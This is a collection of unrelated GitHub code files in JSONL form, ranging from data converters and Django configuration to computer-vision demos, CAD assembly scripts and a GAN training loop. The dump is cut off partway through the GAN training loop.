+{"seq_id":"2148070739","text":"import arff, numpy as np\nimport pandas as pd\nimport sys\n\n# input arguments:\nif len(sys.argv) != 3:\n sys.stderr.write('USAGE: *.py \\n')\n sys.stderr.write('Convert BlueDesc output ARFF to the standard CSV file\\n')\n exit()\nfor arg in sys.argv:\n if arg == '-h' or arg == '--help':\n sys.stderr.write('USAGE: *.py \\n')\n sys.stderr.write('Convert BlueDesc output ARFF to the standard CSV file\\n')\n exit()\n\nin_file = sys.argv[1]\nout_file = sys.argv[2]\n\ndataset = arff.load(open(in_file))\ndata = np.array(dataset['data'],dtype=np.float64)\nheader = np.array(dataset['attributes'])[:, 0]\n\nmols = []\nwith open(in_file, 'r') as iFile:\n for a in iFile:\n if a[:15] =='% NAME OF MOLEC':\n mol_id = a.strip().split(' ')[-1]\n mols.append(mol_id)\n\nfinal_df = pd.DataFrame(data, columns=header)\nfinal_df.index = mols\nfinal_df.dropna(axis=1, inplace=True)\nfinal_df.index.name = 'Id'\n# Add mean values for Na3VO4\nfinal_df.loc['EOS100042'] = final_df.mean()\nsys.stdout.write(f\"added mean values for EOS100042 (Na3VO4)\\n\")\nfinal_df.to_csv(out_file)\nsys.stdout.write(f\"Shape: {final_df.shape}\\n\")\n\n","repo_name":"knawel/EUOS-SLAS","sub_path":"data/arff_to_csv.py","file_name":"arff_to_csv.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4139316401","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 7 01:47:14 2019\n\n@author: Mr.Reliable\n\"\"\"\n\n#https://www.nowcoder.com/practice/ab900f183e054c6d8769f2df977223b5?tpId=90&tqId=30789&tPage=1&rp=1&ru=%2Fta%2F2018test&qru=%2Fta%2F2018test%2Fquestion-ranking\n\n\"\"\"\n牛牛又从生物科研工作者那里获得一个任务,这次牛牛需要帮助科研工作者从DNA序列s中找出最短没有出现在DNA序列s中的DNA片段的长度。\n例如:s = AGGTCTA\n序列中包含了所有长度为1的('A','C','G','T')片段,但是长度为2的没有全部包含,例如序列中不包含\"AA\",所以输出2。\n\n输入:输入包括一个字符串s,字符串长度length(1 ≤ length ≤ 2000),其中只包含'A','C','G','T'这四种字符\n输出:输出一个正整数,即最短没有出现在DNA序列s中的DNA片段的长度。\n\neg:\nAGGTCTA\n2\n\n\"\"\"\ns = input().strip()\n#print(len(s))\nfor i in range(6):\n if 4**i <= len(s) <4**(i+1):\n k = i+1\n \n \ntmp_1 = []\nfor j in range(k):\n tmp = []\n for m in range(len(s)-j):\n tmp.append(s[m:m+j+1])\n se = set(tmp)\n if len(se) < 4**(j+1):\n tmp_1.append(j+1)\n \nprint(tmp_1[0])","repo_name":"alpharol/algorithm_python3","sub_path":"nowcoder/0014.DNA序列.py","file_name":"0014.DNA序列.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"38466301498","text":"\"\"\"begin URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.urls import path, re_path,include\nfrom .views import (\n\thome_page,\n\tcontact_page,\n\tabout_page,\n\tsmile_page,\n login_page,\n register_page,\n logout_view,\n gallery_page, \n set_timezone,\n\t)\nfrom account.views import (\n account_info_view,\n # account_update_info_view,\n user_profile,\n profile_page,\n account_detail_info_view,\n profile_create_view,\n )\nfrom blog.views import blog_post_create_view\nfrom searches.views import search_view \nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',home_page),\n re_path(r'^page/$',about_page),\n re_path(r'^pages/$',about_page),\n re_path(r'^about/$',about_page),\n path('contact/',contact_page),\n path('blog-new/',blog_post_create_view),\n path('blog/',include('blog.urls')), #by proving include('blog.urls') we give the location of the content that we have\n path('smile/',smile_page),\n path('search/',search_view),\n path('login/',login_page),\n path('logout/',logout_view),\n path('register/',register_page),\n path('avatar/',include('avatar.urls')),\n path('timezone/',set_timezone),\n path('account/',include('account.urls')),\n path('account-create/',profile_create_view),\n path('gallery/',gallery_page),\n # path('user-profile/',user_profile),\n # path('account-detail//',account_detail_info_view),\n # path('account-update/',account_update_info_view)\n]\n\nif settings.DEBUG:\n #TEST MODE\n from django.conf.urls.static import static\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"askhatov/Ask-blog","sub_path":"begin/begin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34223773375","text":"# Reference\n# https://docs.opencv.org/4.0.1/d6/d0f/group__dnn.html\n\nimport cv2\nimport imutils\nfrom imutils.video import WebcamVideoStream\n\n# Load the model\nnet = cv2.dnn.readNet('../model/face-detection-adas-0001.xml', '../model/face-detection-adas-0001.bin') \n\n# Specify target device\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)\n\n# Read the Camera\nvs = WebcamVideoStream(src=0).start()\n\nwhile True:\n # grab the frame from the threaded video stream and resize it\n # to have a maximum width of 400 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=600)\n\n\n # Prepare input blob and perform an inference\n blob = cv2.dnn.blobFromImage(frame, size=(672, 384), ddepth=cv2.CV_8U) \n\n net.setInput(blob) \n\n out = net.forward()\n\n # Draw detected faces on the frame\n for detection in out.reshape(-1, 7): \n\n confidence = float(detection[2]) \n\n xmin = int(detection[3] * frame.shape[1]) \n ymin = int(detection[4] * frame.shape[0]) \n\n xmax = int(detection[5] * frame.shape[1]) \n ymax = int(detection[6] * frame.shape[0])\n\n if confidence > 0.5:\n cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 0))\n \n cv2.imshow(\"Frame\", frame)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()","repo_name":"HsinM/OpenVINO-NCS","sub_path":"pi_code/face/code/webcam_test.py","file_name":"webcam_test.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"42230743988","text":"\nfrom .base_strategy import BaseStrategy\n\nclass SAR(BaseStrategy):\n NAME = 'sar'\n # Feature, Bias, Scaler\n FEATURES = [\n ['sar_bias', 0, 5],\n ['sar_diff', 0, 30],\n ['sar_diff_pre', 0, 30],\n ['change', 0, 10],\n ['amp_0105', 0, 2],\n ['amp_0510', 0, 1],\n ]\n DNA_LEN = len(FEATURES)*2\n","repo_name":"hellojixian/stock-ai","sub_path":"lib/indicators/sar.py","file_name":"sar.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"44074281615","text":"import requests\n\napi_base = 'https://icanhazdadjoke.com/'\n\nheaders = {'accept': 'application/json'}\n\nprint('---------HERE ARE 10 JOKES HAHAHAHA------------')\nfor x in range(10):\n response = requests.get(api_base, headers)\n\n if response.status_code == 200:\n resp_as_json = response.json()\n print(resp_as_json['joke'])\n else:\n print('Oops... didn\\'t work')\n","repo_name":"cecilphillip/python-stream","sub_path":"src/dadjokes.py","file_name":"dadjokes.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"29533268887","text":"import numpy as np\nnp.random.seed(1)\nimport sys\n\ndef relu(x):\n return (x>0)*x\n\ndef relu2deriv(output):\n return (output>0)\n\n# Input data\n\nalpha,iterations=(0.1,100)\npixels_per_image,num_labels,hidden_size=(784,10,100)\n\nweights_0_1=0.2*np.random.random((pixels_per_image,hidden_size))-0.1\nweights_1_2=0.2*np.random.random((hidden_size,num_labels))-0.1\n\nfor j in xrange(iteratins):\n error=0\n correct_cnt=0\n for i in xrange(len(images)/batch_size):\n batch_start,batch_end=((i*batch_size),((i+1)*batch_size))\n layer_0=images[batch_start:batch_end]\n layer_1=relu(np.dot(layer_0,weights_0_1))\n dropout_mask=np.random.randint(2,size=layer_1.shape)\n layer_1*=dropout_mask\n layer_2=np.dot(layer_1,weights_1_2)\n \n error+=np.sum((labels[batch_start:batch_end]-layer_2)**2)\n \n for k in xrange(batch_size):\n correct_cnt+=int(np.argmax(layer_2[k:k+1])==np.argmax(labels[batch_start+k:batch_start+k+1]))\n \n delta_layer_2=(layer_2-labels[batch_start:batch_end])/batch_size\n delta_layer_1=delta_layer_2.dot(weights_1_2.T)*relu2deriv(layer_1)\n \n delta_layer_1*=dropout_mask\n \n weights_1_2-=alpha*layer_1.T*dot(delta_layer_2)\n weights_0_1-=alpha*layer_0.T*dot(delta_layer_1)\n \n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/4. Batch Gradient Descent.py","file_name":"4. Batch Gradient Descent.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20700099591","text":"import os\nimport sys\nimport csv\n\n\ndef fileAccess():\n\twith open('test.txt') as f:\n\t\tfor line in f:\n\t\t\tprint(line.strip())\n\n\tprint('-------------------------------------------------------------------')\n\n\twith open('test2.csv') as cf:\n\t\treader = csv.reader(cf, delimiter=' ')\n\t\twith open('test3.csv', 'w') as cf2:\n\t\t\twriter = csv.writer(cf2, delimiter=' ')\n\t\t\tfor row in reader:\n\t\t\t\twriter.writerow([row[1]])\n\t\n\t\ndef main():\n fileAccess()\n\nif __name__ == '__main__':\n main()\t\n","repo_name":"ShashwathKumar/PythonTests","sub_path":"JARVIS/fileWrites/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41559602437","text":"# Name: Basemaps\n# Author: Marios S. Kyriakou, KIOS Research and Innovation Center of Excellence (KIOS CoE)\n# Email: mariosmsk@gmail.com\n# License: MIT\n\n# This plugin works with EPANET MTP4r2:\n# https://github.com/USEPA/SWMM-EPANET_User_Interface/releases/tag/MTP4r2\nimport os\n\nplugin_name = \"Basemaps\"\nplugin_create_menu = True\n__all__ = {\"Google Satellite\":1, \"Openstreetmap\":2}\n\n\ndef checkBasemaps(session, mapname):\n status = True\n for tlayer in session.map_widget.base_group.findLayers():\n if tlayer.layer().name() == mapname:\n session.map_widget.remove_layers([tlayer.layer()])\n session.map_widget.base_group.removeChildNode(tlayer)\n status = False\n break\n return status\n\ndef run(session=None, choice=None):\n\n path = os.getcwd() + \"\\\\plugins\\\\Basemaps\\\\\"\n if choice is None:\n choice = 99\n if choice == 1:\n mapname = \"Google Satellite.xml\"\n status = checkBasemaps(session, mapname)\n if not status:\n return\n\n elif choice == 2:\n mapname = \"Openstreetmap.xml\"\n status = checkBasemaps(session, mapname)\n if not status:\n return\n\n if choice ==1 or choice == 2:\n urlWithParams = path + mapname\n session.map_widget.addRasterLayer(urlWithParams)\n session.map_widget.refresh_extent_needed = False\n","repo_name":"ppavlo02/EPANET-Plugins","sub_path":"Basemaps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"9729459135","text":"import numpy as np\nfrom nbayes2 import *\nimport timeit\n\n# def cmp_NaiveBayes():\ndata = np.genfromtxt('vote_filled.tsv', dtype = int)\nX = data[:, :-1]\ny = data[:, -1]\n\nclr1 = NaiveBayes1()\nclr1.fit(X, y)\nprint(clr1.fit(X, y))\n\nclr2 = NaiveBayes2()\nclr2.fit(X, y)\nprint(clr2.fit(X, y))\n\n# if __name__ == '__main__':\n\n## timeit setups ( 100 hundred exe)\nprint(timeit.timeit(\"print('ie-i')\", setup=\"print('Start timeit')\", number = 100))\nprint(\"NaiveBayes1 = \", timeit.timeit(NaiveBayes1))\nprint(\"NaiveBayes2 = \", timeit.timeit(NaiveBayes2))\n# print(timeit.timeit(clr1.fit(X, y)))\n# print(timeit.timeit(clr2.fit(X, y)))\n","repo_name":"jusui/Data_Science","sub_path":"ML_algorithm/nbayes_1/cmp_NaiveBayes.py","file_name":"cmp_NaiveBayes.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28426454932","text":"\"\"\" \r\nUzrakstiet programmu, kas ielasa skaitli (kā float) -\r\nriņķa līnijas rādiusu un izvada uz ekrāna (print) \r\nriņķa līnijas garumu un laukumu, atbilstoši noformējot atbildi.\r\nPārbaudiet programmas darbību ar dažādiem ievaddatiem.\r\n\"\"\"\r\n\r\nrādius=float(input(\"Ievadi rādiusu!\"))\r\n\r\nlaukums=3.14*(rādius*rādius)\r\nlinijas_garums=2*3.14*rādius\r\n\r\nprint(\"Riņķa laukums ir:3\",laukums)\r\nprint(\"Riņķa līnijas garums ir:\",linijas_garums)","repo_name":"elinaavintisa/praktikums_Python","sub_path":"uzd1.py","file_name":"uzd1.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"lv","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"35489474866","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nGET_WINDOW_YOFFSET_SCRIPT = \"return window.pageYOffset;\"\n\n\ndef configure_driver(path: str, is_headless: bool = True) -> WebDriver:\n \"\"\"\n Creates a Chrome WebDriver instance.\n\n :param path: Path to the Chrome WebDriver executable\n :param is_headless: Specifies whether to run the driver in headless mode\n :return: A Chrome WebDriver instance\n \"\"\"\n chrome_options = Options()\n chrome_options.headless = is_headless\n driver = webdriver.Chrome(executable_path=path, options=chrome_options)\n\n return driver\n\n\ndef scroll_down(driver: WebDriver):\n \"\"\"\n Scrolls the webpage down from the current Y position\n\n :param driver: The Chrome WebDriver instance\n \"\"\"\n scroll_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n scroll = scroll_pos + 250\n driver.execute_script(\"window.scrollTo(0, \" + str(scroll) + \");\")\n\n # Wait for scroll to execute\n time.sleep(.5)\n\n\ndef scroll_until_find_by_class_name(class_name: str, driver: WebDriver, parent=None):\n \"\"\"\n Looks for an WebElement object by class name by scrolling down the entire webpage.\n If a parent WebElement is provided it will only search through its children WebElements.\n\n :param class_name: The WebElement class name to search for.\n :param driver: The Chrome WebDriver instance\n :param parent: (Optional) A Parent WebElement object\n :return: A WebElement object matching the given class name or None if no WebElement was found.\n \"\"\"\n # Start at top of screen\n driver.execute_script(\"window.scrollTo(0, 0);\")\n time.sleep(1)\n last_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n\n element = None\n while element is None:\n try:\n if parent is None:\n element = driver.find_element(By.CLASS_NAME, class_name)\n else:\n element = parent.find_element(By.CLASS_NAME, class_name)\n except NoSuchElementException:\n scroll_down(driver)\n new_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n if last_pos != new_pos:\n last_pos = new_pos\n else:\n return None\n return element\n","repo_name":"Nicholas-C-Brown/COSC419F-Project","sub_path":"src/helper_methods/driver_helper.py","file_name":"driver_helper.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"1058343667","text":"class CapturedPacket:\n\tdef __init__(self, number, id, type, xfer_type, epnum, devnum, busnum, setup, length, data):\n\t\tself.number = number\n\t\tself.id = id\n\t\tself.type = type\n\t\tself.xfer_type = xfer_type\n\t\tself.epnum = epnum\n\t\tself.devnum = devnum\n\t\tself.busnum = busnum\n\t\tself.setup = setup\n\t\tself.length = length\n\t\tself.data = data\n","repo_name":"aib/usb-pcap","sub_path":"usb_pcap/packet.py","file_name":"packet.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24688780479","text":"import datetime\n\nimport requests\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\n\nfrom fishingbs.accounts.models import Profile\nfrom fishingbs.accounts.validators import image_max_size_validator\nfrom fishingbs.mixins import mixins as get\n\n\nUserModel = get_user_model()\n\n\nclass GiveInformationModel(models.Model):\n FISH_TYPES = get.get_fish_types()\n LOCATIONS = get.get_locations_for_news()\n INTENSITIES = get.get_intensities()\n CATCHING_TYPES = get.get_catching_types()\n MAX_LENGTH_FISH_TYPES = get.get_max_length_of_a_sequence(FISH_TYPES)\n MAX_LENGTH_LOCATIONS = get.get_max_length_of_a_sequence(LOCATIONS)\n MAX_LENGTH_INTENSITIES = get.get_max_length_of_a_sequence(INTENSITIES)\n MAX_LENGTH_CATCHING_TYPES = get.get_max_length_of_a_sequence(CATCHING_TYPES)\n\n fish_type = models.CharField(\n max_length=MAX_LENGTH_FISH_TYPES,\n choices=FISH_TYPES,\n blank=False,\n null=False,\n )\n location = models.CharField(\n max_length=MAX_LENGTH_LOCATIONS,\n choices=LOCATIONS,\n blank=False,\n null=False,\n )\n intensity = models.CharField(\n max_length=MAX_LENGTH_INTENSITIES,\n choices=INTENSITIES,\n blank=False,\n null=False,\n )\n last_most_intense = models.TimeField(\n default=datetime.datetime.now,\n blank=False,\n null=False,\n )\n type_of_catching = models.CharField(\n max_length=MAX_LENGTH_CATCHING_TYPES,\n choices=CATCHING_TYPES,\n blank=False,\n null=False,\n )\n photo = models.ImageField(\n upload_to='catches/',\n validators=[\n image_max_size_validator,\n ],\n blank=True,\n null=True,\n )\n comment = models.TextField(\n max_length=1500,\n blank=True,\n null=True,\n )\n created_on = models.DateTimeField(\n auto_now_add=True,\n )\n from_user = models.ForeignKey(\n Profile,\n on_delete=models.CASCADE,\n blank=False,\n null=False,\n default=1,\n )\n\n","repo_name":"Lasabito/fishing_bs","sub_path":"fishingbs/fishingbs/news/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7530642537","text":"from imageai.Detection import ObjectDetection, keras_retinanet\r\nimport os\r\nfrom PIL import Image\r\nimport base64\r\nimport logging as log\r\nfrom flask import Flask, request, make_response\r\nfrom flask_restful import Resource, Api\r\nimport flask_restful as restful\r\nfrom keras.engine.saving import load_model\r\nfrom sqlalchemy import create_engine\r\nfrom json import dumps\r\nfrom flask import jsonify\r\nfrom flask_classful import FlaskView\r\nimport json\r\nfrom keras import backend as K\r\nimport tensorflow as tf\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom pathlib import Path\r\nfrom tkinter import Tk\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nresult = dict()\r\n\r\n\r\ndef init():\r\n global model, graph\r\n # load the pre-trained Keras model\r\n # model = load_model('resnet50_coco_best_v2.0.1.h5')\r\n graph = tf.get_default_graph()\r\n\r\nTk().withdraw()\r\nfilename = askopenfilename()\r\nimg = Path(filename).name\r\nwith open(filename, \"rb\") as imageFile:\r\n # converting download.jpg to a String\r\n str_file = base64.b64encode(imageFile.read())\r\n print(str_file)\r\n\r\n\r\napp = Flask(__name__, template_folder='template')\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\",\"POST\"])\r\ndef predict():\r\n with graph.as_default():\r\n fh = open(\"imageToSave.png\", \"wb\")\r\n fh.write(base64.decodestring(str_file))\r\n fh.close()\r\n log.debug(\"File decrypted !!\")\r\n filename = \"imageToSave.png\"\r\n\r\n log.basicConfig(filename=\"logs.log\", level=log.DEBUG)\r\n # giving the filename\r\n # filename = \"image.jpg\"\r\n execution_path = os.getcwd()\r\n\r\n # creating the detector object for ObjectDetection\r\n log.info(\"Detector activated \")\r\n detector = ObjectDetection()\r\n detector.setModelTypeAsRetinaNet()\r\n detector.setModelPath(os.path.join(execution_path, \"resnet50_coco_best_v2.0.1.h5\"))\r\n detector.loadModel()\r\n detections = detector.detectObjectsFromImage(input_image=filename,\r\n output_image_path=os.path.join(execution_path, \"imagenew.jpg\"))\r\n\r\n # printing the found object names and the probability value\r\n result = dict()\r\n\r\n for eachObject in detections:\r\n # print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\r\n result.update({eachObject[\"name\"]: eachObject[\"percentage_probability\"]})\r\n\r\n print(result)\r\n return sendResponse(result)\r\n K.clear_session()\r\n # displaying image after object detection\r\n img = Image.open('imagenew.jpg')\r\n img.show()\r\n\r\n # passing an string value of image to object\r\n # object detect class gets inherited from imageconvert\r\n\r\n if request.method=='POST':\r\n return result\r\n\r\n@app.route('/form', methods=['GET', 'POST'])\r\ndef form_example():\r\n if request.method == 'POST':\r\n with graph.as_default():\r\n fh = open(\"imageToSave.png\", \"wb\")\r\n fh.write(base64.decodestring(str_file))\r\n fh.close()\r\n log.debug(\"File decrypted !!\")\r\n filename = \"imageToSave.png\"\r\n\r\n log.basicConfig(filename=\"logs.log\", level=log.DEBUG)\r\n # giving the filename\r\n # filename = \"image.jpg\"\r\n execution_path = os.getcwd()\r\n\r\n # creating the detector object for ObjectDetection\r\n log.info(\"Detector activated \")\r\n detector = ObjectDetection()\r\n detector.setModelTypeAsRetinaNet()\r\n detector.setModelPath(os.path.join(execution_path, \"resnet50_coco_best_v2.0.1.h5\"))\r\n detector.loadModel()\r\n detections = detector.detectObjectsFromImage(input_image=filename,\r\n output_image_path=os.path.join(execution_path, \"imagenew.jpg\"))\r\n\r\n # printing the found object names and the probability value\r\n result = dict()\r\n\r\n for eachObject in detections:\r\n # print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\r\n result.update({eachObject[\"name\"]: eachObject[\"percentage_probability\"]})\r\n\r\n print(result)\r\n return sendResponse(result)\r\n K.clear_session()\r\n\r\n return '''
\r\n Image string:
\r\n
\r\n
'''\r\n\r\n\r\ndef sendResponse(responseObj):\r\n response = jsonify(responseObj)\r\n return response\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print((\"* Loading Keras model and Flask starting server...\"\r\n \"please wait until server has fully started\"))\r\n init()\r\n app.run(threaded=True, debug=\"on\", port=9000)\r\n","repo_name":"nikzjadhav/Object-detection-flask","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37228837022","text":"#zbroj znamenaka prirodnog broja\r\n#ulaz(n)\r\n#s = 0\r\n#dok je n > 0 činiti\r\n#{\r\n# s = s + n mod 10\r\n# n = n div 10\r\n#}\r\n#############################\r\n\r\nn = int(input (\"Upiši broj : \"))\r\nn0 = n\r\ns = 0\r\nwhile n > 0 :\r\n s = s + n % 10\r\n n = n // 10\r\nprint(\"Zbroj znamenaka broja \" +str(n0)+ \" je \" +str(s))\r\n","repo_name":"nekm/Informatika_matura","sub_path":"2019_j_18.py","file_name":"2019_j_18.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"hr","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"44374684744","text":"# Importing standard libs\nimport sys\n\n# Insert this directory into the PYTHONPATH to import experimental parameters from experiment_params.py\nsys.path.insert(0, \"${HOME}/work/git/Lab-Management/freecad_models/EM_Coupling_Experiment/code\")\n\n# Insert this directoryinto the PYTHONPATH to import Assembly 2 module\nsys.path.append('${HOME}/.FreeCAD/Mod/FreeCAD_assembly2')\n\n# Importing Assembly 2 libraries\n# Assembly2 is an additional FreeCAD workbench (https://github.com/hamish2014/FreeCAD_assembly2)\nimport importPart\nimport planeConstraint\nimport axialConstraint\n\n# Importing experiment specific parameters\n\n###############################################################################\n# Create and open a new file for assembly\n\nassembly_file = App.newDocument(\"daq\")\nApp.setActiveDocument(assembly_file.Name)\nApp.ActiveDocument = App.getDocument(assembly_file.Name)\nGui.ActiveDocument = Gui.getDocument(assembly_file.Name)\n\n###############################################################################\n# Import computer_table\ncomputer_table = importPart.importPart(filename = '../computer/models/Table.STEP', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n# Fix the position and orientation of computer_table\ncomputer_table.Placement = App.Placement(App.Vector(0,0,0),App.Rotation(App.Vector(1,0,0),90))\n\n################################################################################\n# Import QM9 Data Acquisition System base\n\ndaq_base = importPart.importPart(filename = 'models/QM9_base.fcstd', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n\n# Place on table\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face227\") \nGui.Selection.addSelection(computer_table, \"Face010\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_surface = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_surface.directionConstraint = u\"opposed\"\nApp.ActiveDocument.recompute()\n\n\n# Side offset\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face232\") \nGui.Selection.addSelection(computer_table, \"Face005\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_side = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_side.offset = 500\nApp.ActiveDocument.recompute()\n\n# Front offset\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face236\") \nGui.Selection.addSelection(computer_table, \"Face007\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_front = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_front.offset = -200\nApp.ActiveDocument.recompute()\n\n################################################################################\n# Import QM9 Data Acquisition System top\n\ndaq_top = importPart.importPart(filename = 'models/QM9_top.fcstd', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n\n# Place on daq base\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face265\") \nGui.Selection.addSelection(daq_top , \"Face126\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_top.directionConstraint = u\"opposed\"\nApp.ActiveDocument.recompute()\n\n\n# Side mate\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face242\") \nGui.Selection.addSelection(daq_top , \"Face133\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top_side = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\n# Front mate\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face226\") \nGui.Selection.addSelection(daq_top , \"Face157\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top_front = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\n","repo_name":"QuazarTech/Lab-Management","sub_path":"freecad_models/QM9/QM9.py","file_name":"QM9.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"39882231349","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as vutils\nfrom tqdm import tqdm\nfrom pickle import dump\n\n# set weights for stability\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n\nreal_label = 1\nfake_label = 0\n# Initialize BCELoss function\ncriterion_G = nn.BCELoss()\ncriterion_D = nn.BCELoss()\n\n\ndef training_loop(results_dir, num_epochs, dataloader, netD, netG, device, lr, beta1, nz):\n\n optimizerD = optim.Adam(netD.parameters(), lr=lr, betas=(beta1, 0.999))\n optimizerG = optim.Adam(netG.parameters(), lr=lr, betas=(beta1, 0.999))\n fixed_noise = torch.randn(128, nz, 1, 1, device=device)\n\n img_list = []\n G_losses = []\n D_losses = []\n\n iters = 0\n big_iters = 0\n\n print(\"Starting Training Loop...\")\n for epoch in range(num_epochs):\n\n # For each batch in the dataloader\n for i, data in tqdm(enumerate(dataloader, 0)):\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n ## Train with all-real batch\n netD.zero_grad()\n # Format batch\n real_cpu = data[0].to(device)\n b_size = real_cpu.size(0)\n label = torch.full((b_size,), real_label * 0.9, device=device)\n # Forward pass real batch through D\n output = netD(real_cpu).view(-1)\n # Calculate loss on all-real batch\n errD_real = criterion_D(output, label)\n # Calculate gradients for D in backward pass\n errD_real.backward()\n D_x = output.mean().item()\n\n ## Train with all-fake batch\n # Generate batch of latent vectors\n noise = torch.randn(b_size, nz, 1, 1, device=device)\n # Generate fake image batch with G\n fake = netG(noise)\n label.fill_(fake_label)\n # Classify all fake batch with D\n output = 